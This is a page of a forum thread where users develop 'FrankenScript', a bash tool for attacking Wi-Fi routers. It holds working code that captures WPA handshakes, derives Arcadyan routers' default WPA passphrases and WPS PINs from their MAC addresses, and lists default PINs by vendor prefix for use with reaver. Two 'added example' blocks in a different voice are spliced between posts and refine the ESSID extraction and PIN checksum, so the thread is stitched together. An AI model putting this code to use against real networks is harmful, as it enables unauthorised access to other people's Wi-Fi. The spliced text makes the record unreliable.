Page 2 of 10
Results 51 to 100 of 493

Thread: FrankenScript by Slim76 - It Attacks Access Points and .pcap files

  1. #51
    Join Date
    2013-Jun
    Posts
    123
    Slim... We all know it's not you... Breathe! LoL
    Upload to 0bin.net (that's a zero and then bin.net), great for all kinds of uses as it's an encrypted pastebin.
    Or use Dropbox if you want.

    You assembled a great script and we all want to access it.

  2. #52
    Join Date
    2013-Oct
    Posts
    321
    @ zimmaro

    Cheers for the suggestion mate, will look into it.

    @ brazen

    Cheers for the suggestion, will look into it too.
    Sorry it sounded like I was moaning/bitching at you, I wasn't, it's just how I talk/type. LOL

    @ flyinghaggis

    I'll run through the obvious first:
    1) Did you select your WiFi device?
    2) Is your WiFi device listed under the main menu screen (Chosen Interface: wlan0)?
    3) Did you enable attack mode?
    4) Is attack mode listed under the main menu screen (System Mode: Attack Mode Enabled)?
    5) Does mon0 have a MAC address listed under the main menu screen (MAC address for mon0)?
    6) Is the temp folder in the FrankenScript directory empty?

    Other possible causes could be:
    Sleep timing might need to be increased.
    It's possible that you might have double tapped the keyboard button, or held it down too long.

    If more people report issues I'll have to think about changing the WiFi device detection, maybe the sleep timing, and maybe change the auto ENTER option to manual too.

    FrankenScript-v3.1
    UPDATED: 1/18/2014


    MDK3 - access point reset files are now deleted.
    Changed and added sleep timing.
    Changed WiFi device detection again.


    PasteBin:
    http://goo.gl/PzaT5t
    Last edited by slim76; 2014-01-18 at 15:45.

  3. #53
    Quote Originally Posted by slim76 View Post
    So has easy_box been fully implemented into WPSPIN? If it has I'll remove easy_box from FrankenScript.
    No, it isn't implemented yet in WPSPIN, so you shouldn't remove easy_box but should correct this bug of a missing zero padding somewhere.

    Cheers, and may the force be with you and frankenscript.sh.

  4. #54
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by kcdtv View Post
    No, it isn't implemented yet in WPSPIN, so you shouldn't remove easy_box but should correct this bug of a missing zero padding somewhere.

    Cheers, and may the force be with you and frankenscript.sh.
    LOL, cheers dude.

    I'll be honest and say fixing that bug is probably beyond my knowledge at this point in time, maybe someone else who knows what they're doing could fix the issue for us.

  5. #55
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    Quote Originally Posted by slim76 View Post
    NOTE:
    If anyone knows of any other WPS default pin generaters please could you post them for me.
    Many thanks.
    http://packetstormsecurity.com/files...Generator.html
    Smile while you can for in the future there my be nothing to smile about.

  6. #56
    Join Date
    2013-Oct
    Posts
    321
    Cheers matey, most grateful. :-)

    Do you know how to use it? Does it use the standard MAC of the AP (openly broadcast), or does it use some other MAC (not broadcast)?
    Cheers mate.

  7. #57
    Join Date
    2013-Jul
    Posts
    844
    We tried to get your download as a download file from your sites. We spent an hour and never got the file. We went to the pastebin site and captured the text for Version 3.1. When we ran the program we got an error at line 105 and an error at line 1552. We captured the file three (3) times and ran it and got the same error. We cannot capture the error as the screen constantly blinks and is refreshed. Line 105 is an illegal operation -s and line 1552 says read arg count.

  8. #58
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by mmusket33 View Post
    We tried to get your download as a download file from your sites. We spent an hour and never got the file. We went to the pastebin site and captured the text for Version 3.1. When we ran the program we got an error at line 105 and an error at line 1552. We captured the file three (3) times and ran it and got the same error. We cannot capture the error as the screen constantly blinks and is refreshed. Line 105 is an illegal operation -s and line 1552 says read arg count.
    Sorry to hear you're having trouble with it. Did you change anything in the script? Or maybe you got some sort of corruption while downloading or copying and pasting.

    I'll be updating it again soon, I've made a few changes and added some new things.

  9. #59
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98

    Quote Originally Posted by slim76 View Post
    Cheers matey, most grateful. :-)

    Do you know how to use it? Does it use the standard MAC of the AP (openly broadcast), or does it use some other MAC (not broadcast)?
    Cheers mate.
    Sorry, I have no idea, I just found it while searching around.
    I also finally got around to testing your version 1.3 of FrankenScript. I really like it, it cracked a WPS enabled router, but I do have one problem (fsc.JPG): when scanning for networks to collect a handshake your script doesn't display the full name of the router. As you can see from my screenshot this could be a problem, the Suddenlink routers have some code that follows their name.
    Smile while you can for in the future there my be nothing to smile about.

  10. #60
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by shaberu View Post
    Sorry, I have no idea, I just found it while searching around.
    I also finally got around to testing your version 1.3 of FrankenScript. I really like it, it cracked a WPS enabled router, but I do have one problem (fsc.JPG): when scanning for networks to collect a handshake your script doesn't display the full name of the router. As you can see from my screenshot this could be a problem, the Suddenlink routers have some code that follows their name.
    Sorry matey, I'll look into it and see if I can fix it for the next update.
    Does it contain any symbols, or does it just consist of characters and digits? Can you post an example (full broadcast ESSID) please.

    Try this:

    Look in FrankenScript for the following lines:
    ----------------------------------------------------------------------

    ###### [4] Capture WPA/WPA2 Handshake ######
    4)
    cd $HOME/FrankenScript/temp
    clear
    echo $RED"Scan for possible targets."
    echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."
    read -p $GREEN"Press [Enter] to start the scan.$STAND"

    xterm -geometry 111x35+650+0 -l -lf WPA_Scan.txt -e airodump-ng --encrypt WPA mon0

    tac WPA_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | grep "PSK" | sed -r -e 's/\./ /' | sed '/<length: 0>/d' > temp0.txt
    cat temp0.txt | sed 's/^................................................. .........................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
    sleep 1

    PresentedAPs=$(cat PresentedAPs.txt)


    Change this line:
    ---------------------------

    cat temp0.txt | sed 's/^................................................. .........................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt

    Replace it with this line:
    --------------------------------------

    cat temp0.txt | awk '{ print $11 }' | nl -ba -w 1 -s ': ' > PresentedAPs.txt
    Last edited by slim76; 2014-01-28 at 13:31.
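An added example, not code from the thread or from FrankenScript, that reproduces the truncation the two replies above discuss on constructed airodump-ng-style rows (not a real capture) and shows an extraction that leaves the ESSID whole. As I read the pipeline in the post, the `sed 's/\./ /'` step exists to normalise the MB column (airodump-ng prints it as e.g. `54e.` when the AP advertises QoS and short preamble), but on a row whose MB column carries no period the substitution lands on the first period inside the ESSID instead, and the awk that follows then sees the name as two fields, so `$11` (or `$1, $2` after the fixed-width sed) is cut off exactly at that period. The alternative below never touches periods; it takes everything after the AUTH column as the ESSID, which assumes the rows were already filtered to PSK networks as the `grep "PSK"` on this page does. Function names are my own.

```shell
#!/bin/bash
# Constructed airodump-ng-style rows (not a real capture). Column order follows
# the rows the pipeline on this page grep's for:
#   BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
# Row 2 has no '.' in its MB column ("54e") and a '.' inside its ESSID.
SAMPLE_ROWS='00:11:22:33:44:55  -40  12  3  0   6  54e. WPA2 CCMP PSK  HomeNet
00:11:22:33:44:66  -55   9  0  0  11  54e  WPA2 CCMP PSK  suddenlink.net-ABCD
00:11:22:33:44:77  -70   4  0  0   1  54e. WPA2 CCMP PSK  Coffee Shop WiFi'

# The extraction from the post: replace the first '.' on each line, then print
# field 11. On row 2 the replaced '.' is the one in the ESSID, so awk prints
# only "suddenlink" (the rest of the name became field 12).
essids_original() {
    printf '%s\n' "$SAMPLE_ROWS" | sed -e 's/\./ /' | awk '{ print $11 }'
}

# Alternative: leave periods alone and take everything after the AUTH column
# ("PSK") as the ESSID, so embedded periods and spaces both survive.
essids_fixed() {
    printf '%s\n' "$SAMPLE_ROWS" | awk '
        match($0, / PSK[[:space:]]+/) {
            essid = substr($0, RSTART + RLENGTH)
            sub(/[[:space:]]+$/, "", essid)   # drop trailing whitespace
            print essid
        }'
}

# Numbered menu in the style of PresentedAPs.txt, built from the fixed extraction.
presented_aps() {
    essids_fixed | nl -ba -w 1 -s ': '
}

echo "original pipeline:"
essids_original
echo "period-safe extraction:"
presented_aps
```

Run stand-alone it prints the truncated list first and the full names second; the point to carry back into the script is that the column normalisation has to be tied to the MB column itself rather than to "the first period on the line".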

  11. #61
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    I tried your fix, it didn't help, but here is a screen shot of the networks: suc.JPG
    Smile while you can for in the future there my be nothing to smile about.

  12. #62
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by shaberu View Post
    I tried your fix, it didn't help, but here is a screen shot of the networks: suc.JPG
    I can't see any reason why it's doing what you say.
    The only thing I can think of is that the broadcast ESSID might have spaces in its name. I used the awk command to print columns, so anything with a space would be a different column and wouldn't be printed on the screen.

  13. #63
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    They don't have any spaces. I believe it's caused by the period in their names, because that's where it cuts off.
    Smile while you can for in the future there my be nothing to smile about.

  14. #64
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by shaberu View Post
    They don't have any spaces. I believe it's caused by the period in their names, because that's where it cuts off.
    It's strange because you've tried two different commands.
    One command grepped for the last column, the other command deleted everything up to the beginning of the ESSID (so the ESSID and everything after should have been printed).
    I'm still updating FrankenScript, it would have been done already if I hadn't deleted stuff that I shouldn't have. :-(

  15. #65
    Quote Originally Posted by slim76 View Post
    LOL, cheers dude.

    I'll be honest and say fixing that bug is probably beyond my knowledge at this point in time, maybe someone else who knows what they're doing could fix the issue for us.
    I made an update of WPSPIN and implemented the corrected algorithm in bash in a function called ARCADYAN.

    I just simplified and corrected the bash code for the WPA from Wotan and used it for the PIN with the same variables.
    You "feed it" with $BSSID, which is the MAC address of the target in original format XX:XX:XX:XX:XX:XX.
    It gives you back $DEFAULTWPA with the WPA passphrase and $STRING, which are the 7 numbers of the PIN;
    then it calls $CHECKSUM, which you already have implemented in your script, to generate the full PIN (variable $PIN).

    Code:
    ARCADYAN(){
    # WPSPIN 1.5 - GPL v 3  by kcdtv
    # This function uses three amazing works
    #   1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc 
    #   2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51
    #   3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team (www.lampiweb.com)
    # 
    # Thanks to the three of them for their dedication and passion and for delivering full disclosure and free code
    # This function is based on the script easybox_keygen.sh previously mentioned
    # The quotations from the original work start with a double hash and are between quotes
    # Some variables and lines are changed for better integration, and I added the PIN calculation and Coeman's trick for the default WPA
    # The lines marked with six hashes and "unchanged" are exactly the same as in easybox_keygen, like this "######unchanged"
    
    
    # This function requires $BSSID, which is the MAC address (hex, format XX:XX:XX:XX:XX:XX)
    # It will return $DEFAULTSSID with the default ESSID, the WPA passphrase ($DEFAULTWPA) and $STRING, the first 7 digits of our PIN, ready to use in CHECKSUM to
    # give the full WPS PIN ($PIN)
    
    ## "Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal." < original quote from easybox_keygen.sh
    deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) # suppression of $take5 and $last4 compared with the easybox code: the job is done directly in the array assignment, and the variable $MAC has been replaced by $BSSID, which is what WPSPIN uses
    ## "The digits M9 to M12 are just the last digits (9.-12.) of the MAC:" < original quote from easybox_keygen.sh
    hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) ######unchanged
    ## K1 = last byte of (d0 + d1 + h2 + h3) < original quote from easybox_keygen.sh
    ## K2 = last byte of (h0 + h1 + d2 + d3) < original quote from easybox_keygen.sh
    c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})  ######unchanged
    c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})  ######unchanged
    K1=$((($c1)%16))  ######unchanged
    K2=$((($c2)%16))  ######unchanged
    X1=$((K1^${deci[3]}))  ######unchanged
    X2=$((K1^${deci[2]}))  ######unchanged
    X3=$((K1^${deci[1]}))  ######unchanged
    Y1=$((K2^0x${hexi[1]}))  ######unchanged
    Y2=$((K2^0x${hexi[2]}))  ######unchanged
    Y3=$((K2^0x${hexi[3]}))  ######unchanged
    Z1=$((0x${hexi[2]}^${deci[3]}))  ######unchanged
    Z2=$((0x${hexi[3]}^${deci[2]}))  ######unchanged
    Z3=$((K1^K2))  ######unchanged
    STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) # used later to generate our PIN: the first 7 digits
    DEFAULTWPA=$(printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F | tr 0 1) # the change from the original script in the most important thing, the default pass, is the adaptation of Coeman76's work on Spanish Vodafone, where he found out that no 0 is used in the final pass
    CHECKSUM
    }

    I put you back CHECKSUM in case it helps you

    Code:
    CHECKSUM(){                                                                  # The function checksum was written for bash by antares_145 from crack-wifi.com
    PIN=`expr 10 '*' $STRING`                                                    # We will have to define first the string $STRING (the 7 first number of the WPS PIN)
    ACCUM=0                                                                      # to get a result using this function)
                                                                 
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`       # multiplying the first number by 3, the second by 1, the third by 3 etc....
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`             # so we follow the pattern for our seven number
    
    DIGIT=`expr $ACCUM '%' 10`                                                   # we define our digit control: the sum reduced with base 10 to the unit number
    CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`                                 # the checksum is equal to " 10 minus  digit control "
    
    PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`)                             # Some zero-padding in case that the value of the PIN is under 10000000   
    }                                                                            # STRING + CHECKSUM gives the full WPS PIN


    Feel free to use the code, and if you have any question about it do not hesitate to ask.


    cheers

  16. #66
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by kcdtv View Post
    I made an update of WPSPIN and implemented the corrected algorithm in bash in a function called ARCADYAN.

    I just simplified and corrected the bash code for the WPA from Wotan and used it for the PIN with the same variables.
    You "feed it" with $BSSID, which is the MAC address of the target in original format XX:XX:XX:XX:XX:XX.
    It gives you back $DEFAULTWPA with the WPA passphrase and $STRING, which are the 7 numbers of the PIN;
    then it calls $CHECKSUM, which you already have implemented in your script, to generate the full PIN (variable $PIN).

    Feel free to use the code, and if you have any question about it do not hesitate to ask.

    cheers
    Nice work matey.
    I know you said feel free to ask any questions, but I was wondering if I could go a step further and ask if you would be able to correct the script for me please. :-)
    I'm sorry to ask, I'm still very new to this sort of thing. LOL
    If you can, please feel free to add any credits or such.

    Code:
    #!/bin/bash
    #
    #
    #
    #####################################################################
    
    AP_essid=$(cat $HOME/FrankenScript/Scripts/AP_essid.txt)
    AP_bssid=$(cat $HOME/FrankenScript/Scripts/AP_bssid.txt)
    ESSID=$(echo $AP_essid)
    BSSID=$(echo $AP_bssid)
    
    #####################################################################
    
    FUNC_CHECKSUM(){
    ACCUM=0
    
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
    
    DIGIT=`expr $ACCUM '%' 10`
    CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`
    
    PIN=`expr $PIN '+' $CHECKSUM`
    ACCUM=0
    
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'`
    
    RESTE=`expr $ACCUM '%' 10`
     }
    
    CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')
    
    FINBSSID=$(echo $BSSID | cut -d ':' -f4-)
    
    MAC=$(echo $FINBSSID | tr -d ':')
    
    CONVERTEDMAC=$(printf '%d\n' 0x$MAC)
    
    FINESSID=$(echo $ESSID | cut -d '-' -f2)
    
    PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')
    
    CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')
    
    MACESSID=$(echo $PAREMAC$FINESSID)
    
    STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`
    
    PIN=`expr 10 '*' $STRING`
    
    FUNC_CHECKSUM
    
    PINWPS1=$(printf '%08d\n' $PIN)
    
    STRING2=`expr $STRING '+' 8`
    PIN=`expr 10 '*' $STRING2`
    
    FUNC_CHECKSUM
    
    PINWPS2=$(printf '%08d\n' $PIN)
    
    STRING3=`expr $STRING '+' 14`
    PIN=`expr 10 '*' $STRING3`
    
    FUNC_CHECKSUM
    
    PINWPS3=$(printf '%08d\n' $PIN)
    
    if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] &&  [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] &&  [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];
    
    then
    
    CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)
    
    RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`
    
    STRING4=`expr $RAIZ '+' 7`
    
    PIN=`expr 10 '*' $STRING4`
    
    FUNC_CHECKSUM
    
    PINWPS4=$(printf '%08d\n' $PIN)
    
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4  "
    PIN4REAVER=$PINWPS4
    else
    case $CHECKBSSID in
    04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1  
    $RED"Other Possible Pin"$RED:$STAND $PINWPS2  
    $RED"Other Possible Pin"$RED:$STAND $PINWPS3"
    PIN4REAVER=$PINWPS1
    ;;
    001915)
    echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
    PIN4REAVER=12345670
    ;;
    404A03)
    echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
    PIN4REAVER=11866428
    ;;
    F43E61 | 001FA4)
    echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
    PIN4REAVER=12345670
    ;;
    001A2B)
    if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
    then
    echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
    PIN4REAVER=88478760
    else
    echo -e "PIN POSSIBLE... > $PINWPS1"
    PIN4REAVER=$PINWPS1
    fi
    ;;
    3872C0)
    if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
    then
    echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
    PIN4REAVER=18836486
    else
    echo -e "PIN POSSIBLE    > $PINWPS1"
    PIN4REAVER=$PINWPS1
    fi
    ;;
    FCF528)
    echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
    PIN4REAVER=20329761
    ;;
    3039F2)
    echo -e "several possible PINs, ranked in order>  
     16538061 16702738 18355604 88202907 73767053 43297917"
    PIN4REAVER=16538061
    ;;
    A4526F)
    echo -e "several possible PINs, ranked in order>  
     16538061 88202907 73767053 16702738 43297917 18355604 "
    PIN4REAVER=16538061
    ;;
    74888B)
    echo -e "several possible PINs, ranked in order>  
     43297917 73767053 88202907 16538061 16702738 18355604"
    PIN4REAVER=43297917
    ;;
    DC0B1A)
    echo -e "several possible PINs, ranked in order>  
     16538061 16702738 18355604 88202907 73767053 43297917"
    PIN4REAVER=16538061
    ;;
    5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
    PIN4REAVER=$PINWPS1
    ;;
    002275)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    08863B)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    001CDF)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    00A026)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    5057F0)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    C83A35 | 00B00C | 081075)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    E47CF9 | 801F02)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    0022F7)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    *)
    PIN4REAVER=$PINWPS1
    ;;
    esac
    fi
    Last edited by slim76; 2014-01-30 at 03:09.
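An added example, not code from either post above: the WPS PIN checksum rule that both the CHECKSUM function in kcdtv's post and FUNC_CHECKSUM in the script just posted implement (weights 3,1,3,1,3,1,3 over the first seven digits, checksum = (10 - sum mod 10) mod 10), written as shell functions that work on the PIN as a string. Because `expr` treats "0012345" as the number 12345, a seven-digit string with leading zeros loses its padding unless it is reprinted with `printf '%08d'` (the "missing zero padding" bug mentioned earlier in the thread); handling the digits as text avoids that entirely. A validator for a complete 8-digit PIN is included because the same rule is what lets you check that a PIN someone hands you is at least well-formed. Function names are my own.

```shell
#!/bin/bash
# WPS PIN checksum helpers. Digit positions 1,3,5,7 weigh 3, positions 2,4,6
# weigh 1; the eighth digit makes the weighted sum a multiple of 10.

# Print the checksum digit for a 7-digit string (leading zeros allowed).
wps_checksum() {
    seven=$1
    [ "${#seven}" -eq 7 ] || { echo "need exactly 7 digits" >&2; return 1; }
    accum=0
    i=0
    while [ "$i" -lt 7 ]; do
        d=$(printf '%s' "$seven" | cut -c $((i + 1)))
        case "$d" in [0-9]) ;; *) echo "non-digit in PIN" >&2; return 1 ;; esac
        if [ $((i % 2)) -eq 0 ]; then w=3; else w=1; fi   # odd positions weigh 3
        accum=$((accum + w * d))
        i=$((i + 1))
    done
    echo $(( (10 - accum % 10) % 10 ))
}

# Build the full 8-digit PIN from its first seven digits, padding preserved.
wps_full_pin() {
    cs=$(wps_checksum "$1") || return 1
    printf '%s%s\n' "$1" "$cs"
}

# Return 0 when an 8-digit PIN carries the correct checksum, 1 otherwise.
wps_pin_valid() {
    pin=$1
    [ "${#pin}" -eq 8 ] || return 1
    expected=$(wps_checksum "${pin%?}") || return 1   # first seven digits
    [ "${pin#???????}" = "$expected" ]                 # compare the last digit
}

wps_full_pin 1234567     # prints 12345670
wps_full_pin 0000010     # prints 00000109, the leading zeros survive
wps_pin_valid 12345670 && echo "12345670: checksum ok"
wps_pin_valid 12345678 || echo "12345678: checksum wrong"
```

The three default PINs quoted in the script (12345670, 11866428, 88478760) all pass `wps_pin_valid`, which is a quick sanity check to run on any hard-coded PIN list before shipping it.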

  17. #67
    You should collect the Arcadyan MACs to write your case condition

    Code:
    ;;
    XXXXXX | XXXXXX)
    where you have the X you put the first 6 digits of the Arcadyan MAC, without the colons

    and then you generate STRING

    Code:
    deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) 
    hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) 
    c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})  
    c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})  
    K1=$((($c1)%16)) 
    K2=$((($c2)%16))  
    X1=$((K1^${deci[3]}))  
    X2=$((K1^${deci[2]}))  
    X3=$((K1^${deci[1]}))  
    Y1=$((K2^0x${hexi[1]}))  
    Y2=$((K2^0x${hexi[2]}))  
    Y3=$((K2^0x${hexi[3]})) 
    Z1=$((0x${hexi[2]}^${deci[3]}))  
    Z2=$((0x${hexi[3]}^${deci[2]}))  
    Z3=$((K1^K2))  
    STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)
    then you generate the checksum to get the full PIN

    Code:
    PIN=`expr 10 '*' $STRING`
    FUNC_CHECKSUM
    PIN4REAVER=$(printf '%08d\n' $PIN)

    that will give you

    Code:
    ;;
    XXXXXX | XXXXXX)
    deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) 
    hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) 
    c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})  
    c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})  
    K1=$((($c1)%16)) 
    K2=$((($c2)%16))  
    X1=$((K1^${deci[3]}))  
    X2=$((K1^${deci[2]}))  
    X3=$((K1^${deci[1]}))  
    Y1=$((K2^0x${hexi[1]}))  
    Y2=$((K2^0x${hexi[2]}))  
    Y3=$((K2^0x${hexi[3]})) 
    Z1=$((0x${hexi[2]}^${deci[3]}))  
    Z2=$((0x${hexi[3]}^${deci[2]}))  
    Z3=$((K1^K2))  
    STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) 
    PIN=`expr 10 '*' $STRING`
    FUNC_CHECKSUM
    PIN4REAVER=$(printf '%08d\n' $PIN)

    that you have to place in your case/esac statement, anywhere as long as it is before
    Code:
    ;;
    *)

  18. #68
    Join Date
    2013-Oct
    Posts
    321
    Sorry mate, I meant would you be able to amend the script I posted so I only have to paste it back into FrankenScript.

    I know it's kinda cheeky to ask, sorry. :-)

    I've been in stupid mode for the last few days and I'm having trouble following even simple things. LOL

  19. #69


    At least explain to me more what you want to do, how you want to call the variables, where it is supposed to go, for what...
    Do you want to generate the PIN for all devices or just for Arcadyan?
    (It seems that the Arcadyan algorithm is used by Askey on some models; if I get confirmation of this I will post it here.)
    cheers

  20. #70
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by kcdtv View Post


    At least explain to me more what you want to do, how you want to call the variables, where it is supposed to go, for what...
    Do you want to generate the PIN for all devices or just for Arcadyan?
    (It seems that the Arcadyan algorithm is used by Askey on some models; if I get confirmation of this I will post it here.)
    cheers
    Would it be possible to have it set up like the one I posted above (in a separate script), and have it generate the PIN for all devices?
